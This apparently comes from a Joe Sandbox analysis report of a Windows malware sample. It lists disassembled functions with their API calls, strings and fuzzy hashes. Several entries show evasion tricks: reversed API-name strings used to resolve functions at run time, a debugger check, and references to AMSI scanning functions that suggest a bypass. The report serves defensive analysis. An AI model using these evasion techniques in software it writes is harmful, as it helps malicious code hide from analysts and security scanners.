Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 63b6a37788cc9953f5343d8d0add01b9b7d3f43e7c8698fa8b4503afc28eed14
Instruction ID: 6ebdd7fb2dacc12e4a4cf657a1ad8978dc86fd9d9784f31c344c3869f2a3611a
Opcode Fuzzy Hash: 63b6a37788cc9953f5343d8d0add01b9b7d3f43e7c8698fa8b4503afc28eed14
Instruction Fuzzy Hash: CF616E35B003689BDB00FBA4DC90BDF77BBDF48340F1198B5A1099B605CA38D94E9BA5

Function 02B3AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AE38
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B3AE4F
IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AEE3
IsBadReadPtr.KERNEL32(?,00000002), ref: 02B3AEEF
IsBadReadPtr.KERNEL32(?,00000014), ref: 02B3AF03

Strings

KernelBase, xrefs: 02B3AE4A
LoadLibraryExA, xrefs: 02B3AE45

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 6f5de11134bf9064cb31d8ce290aba7405be1d99a2657e10d1dbf065e73ec4a3
Instruction ID: b85f60ed237f951c2e89ea557c60191714f1af377d90485f7c3a2b13f6eb55c9
Opcode Fuzzy Hash: 6f5de11134bf9064cb31d8ce290aba7405be1d99a2657e10d1dbf065e73ec4a3
Instruction Fuzzy Hash: 563122B1640315BBDB12DF68CC85F9A77A8EF04754F204590FA98DB281D774A950CBA1

Function 02B2432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B24365
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B2436B
GetStdHandle.KERNEL32(000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8), ref: 02B24380
WriteFile.KERNEL32(00000000,000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?), ref: 02B24386
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B243A4

Strings

Runtime error at 00000000, xrefs: 02B2435E, 02B2439D
Error, xrefs: 02B24398

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
Instruction ID: 307a2fde8b0f9d07f7b8676dad534f2884633019e781f05f1b82ac8d85953777
Opcode Fuzzy Hash: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
Instruction Fuzzy Hash: 7BF02B71AD033074F710A7646D46F59276C4B05F55F104AD4F23C994D18BB490CCDB26

Function 02B2AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02B2ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
Part of subcall function 02B2ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
Part of subcall function 02B2ACBC: GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
Part of subcall function 02B2ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE

CharToOemA.USER32(?,?), ref: 02B2AE7B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B2AE98
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AE9E
GetStdHandle.KERNEL32(000000F4,02B2AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEB3
WriteFile.KERNEL32(00000000,000000F4,02B2AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEB9
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B2AEDB
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B2AEF1

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 491f808e2b7a675c36f1f545d5a9c6246c2cbdb305617e945d2fb2f1840e0b96
Instruction ID: 11047321ceed2af91b8804a99d83c7b5814b2d479ac08b8385ac415a4eef22a1
Opcode Fuzzy Hash: 491f808e2b7a675c36f1f545d5a9c6246c2cbdb305617e945d2fb2f1840e0b96
Instruction Fuzzy Hash: 1A1130B25483507ED601FBA4DC81F9B77EDAB44740F40099AB758D71E0DA70E94C8F66

Function 02B2E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E5A5
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E5C1
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B2E5FA
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E677
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B2E690
VariantCopy.OLEAUT32(?,00000000), ref: 02B2E6C5

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: aa8a0f72767948a6574ddabd34ab5f3960e8fe41a1014243c0a974b32238fde2
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 7F51C6759007299BCB22DB59CC80BD9B3BDAF4D304F0442D5E60DA7206DA30EF898F65

Function 02B23568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3

Strings

FPUMaskValue, xrefs: 02B235B4
SOFTWARE\Borland\Delphi\RTL, xrefs: 02B23580

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
Instruction ID: f060609930730e8b638e9741eb05c7260813a215267a686851b9cb279585f51c
Opcode Fuzzy Hash: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
Instruction Fuzzy Hash: 7201D879954328BAF711DB90CD42BBD77FCEB08710F1005E1BA0CD7680E678AA14DB59

Function 02B380C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
GetProcAddress.KERNEL32(?,?), ref: 02B38125

Strings

Kernel32, xrefs: 02B38108
sserddAcorPteG, xrefs: 02B380DB

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 6d1bec3b9f3e7e35ed84b7aa921e8b14818c4212109a58f2ec86b04f4cbf6aec
Instruction ID: 8acf2a93a133c37591560a337c867ce83f8fc216adcddbc4a490d41ec46cd9eb
Opcode Fuzzy Hash: 6d1bec3b9f3e7e35ed84b7aa921e8b14818c4212109a58f2ec86b04f4cbf6aec
Instruction Fuzzy Hash: 5E014F75A50308BFEB02EFA4DC41A9E77BEEB4D710F5184A4F508A7A10DA70A915CA21

Function 02B2A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02B2AA67,?,?,00000000), ref: 02B2A9E8

Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B2AA67,?,?,00000000), ref: 02B2AA18
EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02B2AA23
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B2AA67,?,?,00000000), ref: 02B2AA41
EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02B2AA4C

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: a202f69da43f37349ba956e40217c894746d713e8073df507476f02ab382b793
Instruction ID: a5f4c26f98753ecec4e842a52e2aa809cce7e888cf180a585b60fe8a573c8895
Opcode Fuzzy Hash: a202f69da43f37349ba956e40217c894746d713e8073df507476f02ab382b793
Instruction Fuzzy Hash: 7201F7316403786BF702B6748D12FAE735DDF46B20F9101E0F62CA6A94D6249E0C8A68

Function 02B4BE4A Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B23538: GetKeyboardType.USER32(00000000), ref: 02B2353D
Part of subcall function 02B23538: GetKeyboardType.USER32(00000001), ref: 02B23549

GetCommandLineA.KERNEL32 ref: 02B4C06C
GetACP.KERNEL32 ref: 02B4C080
GetCurrentThreadId.KERNEL32 ref: 02B4C08A

Part of subcall function 02B23568: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
Part of subcall function 02B23568: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
Part of subcall function 02B23568: RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3

Strings

x6d, xrefs: 02B4C071

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
String ID: x6d
API String ID: 3316616684-1717621966
Opcode ID: 30211bde1758b2fed10c1403161e81695cd3e2fdc00584dfb45b8a65b0cadce2
Instruction ID: 91f0d0c4e3d5c144bcd8ed875747b4d74fa2539a981557b57b73cf4cf6e7f338
Opcode Fuzzy Hash: 30211bde1758b2fed10c1403161e81695cd3e2fdc00584dfb45b8a65b0cadce2
Instruction Fuzzy Hash: 381182B4C953A08ED312AF74619A2493F75AF13388B085CDDC5884F253E738811ECF66

Function 02B2AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02B2AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B2AAAF

Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762

Strings

eeee, xrefs: 02B2ABBE
ggg, xrefs: 02B2AB95
yyyy, xrefs: 02B2ABA5

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: b750038e9c89debfc4cee12a1f2013b4bcb7ad13777f4659e02d22528c5655cd
Instruction ID: 19d47aabf594e3cf978a46fec59b86228c00f9641e24902e1f6034792b09de02
Opcode Fuzzy Hash: b750038e9c89debfc4cee12a1f2013b4bcb7ad13777f4659e02d22528c5655cd
Instruction Fuzzy Hash: 7C41F2313043394BD701AB688C907BEB3FBDB85200B5455E5A47ED7714EA68E90DCA21

Function 02B38018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Strings

KernelBASE, xrefs: 02B38051
AeldnaHeludoMteG, xrefs: 02B38031

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: AeldnaHeludoMteG$KernelBASE
API String ID: 1883125708-1952140341
Opcode ID: 611439da5fda73215915846b13a337ff9c093b8236d7d987a482c0b456fcc2fb
Instruction ID: 67369ba15b2ef030814d666a6cc287ed0db5d5708a1517ed16dd016d4c00d9c1
Opcode Fuzzy Hash: 611439da5fda73215915846b13a337ff9c093b8236d7d987a482c0b456fcc2fb
Instruction Fuzzy Hash: 07F09071650308BFEB02EFA8DC5195E77BEEB49B40B9149E0F508D3A10DA30AE14DA22

Function 02B3EB8C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF90,UacInitialize,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString), ref: 02B3EB92
GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBA4

Strings

IsDebuggerPresent, xrefs: 02B3EB9E
KernelBase, xrefs: 02B3EB8D

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsDebuggerPresent$KernelBase
API String ID: 1646373207-2367923768
Opcode ID: 26a03fe9f57e4a343732b95ce0c2763a0328db9ae733b17bc54e3a23e9f858f7
Instruction ID: 4efd73a15327f5f74c5022468ea0d1c43ab416030ceddd4617969965212bb60a
Opcode Fuzzy Hash: 26a03fe9f57e4a343732b95ce0c2763a0328db9ae733b17bc54e3a23e9f858f7
Instruction Fuzzy Hash: A0D012713513601DF9037AF40CC4C9E23CD8F0552D7200EE2B027D10E1F966C8195511

Function 02B2C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02B4C10B,00000000,02B4C11E), ref: 02B2C3FA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B2C40B

Strings

kernel32.dll, xrefs: 02B2C3F5
GetDiskFreeSpaceExA, xrefs: 02B2C405

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: f2a80324dfd80789de8712b32feac9ddc1184fbd5b72273787e003245f3874fd
Instruction ID: 2b1bf4ae431757d57b119d2465ed539047aab8329ff5b202203a6556dcdb15a9
Opcode Fuzzy Hash: f2a80324dfd80789de8712b32feac9ddc1184fbd5b72273787e003245f3874fd
Instruction Fuzzy Hash: 1FD05E79A403724AF700AFB168C163F2BC8A714785F0558E6F01D57101D7B1441C4F56

Function 02B2E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E217
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E233
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E2AA
VariantClear.OLEAUT32(?), ref: 02B2E2D3

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 5e5334e8bcb318eabf8c51893ae59f510fa7dcc4444bf11d1c945759e12d8e69
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 6441E775A003399BCB61DB59CC90BD9B3BDEF49205F0042E5E64DA7215DA30EF888F64

Function 02B2ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 5c7d029f37b619222101338d6ce81cc880e5b12ac0401df6e131c6cdf36d84ad
Instruction ID: cf617d44c66255a356b58c6b4d9fde1f39eaabb5289a385741597e4b54eb6d4f
Opcode Fuzzy Hash: 5c7d029f37b619222101338d6ce81cc880e5b12ac0401df6e131c6cdf36d84ad
Instruction Fuzzy Hash: DC410971A403689BDB21EB68CC84BDAB7FDAB08341F0444E5A64CE7245DB749F898F50

Function 02B2ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
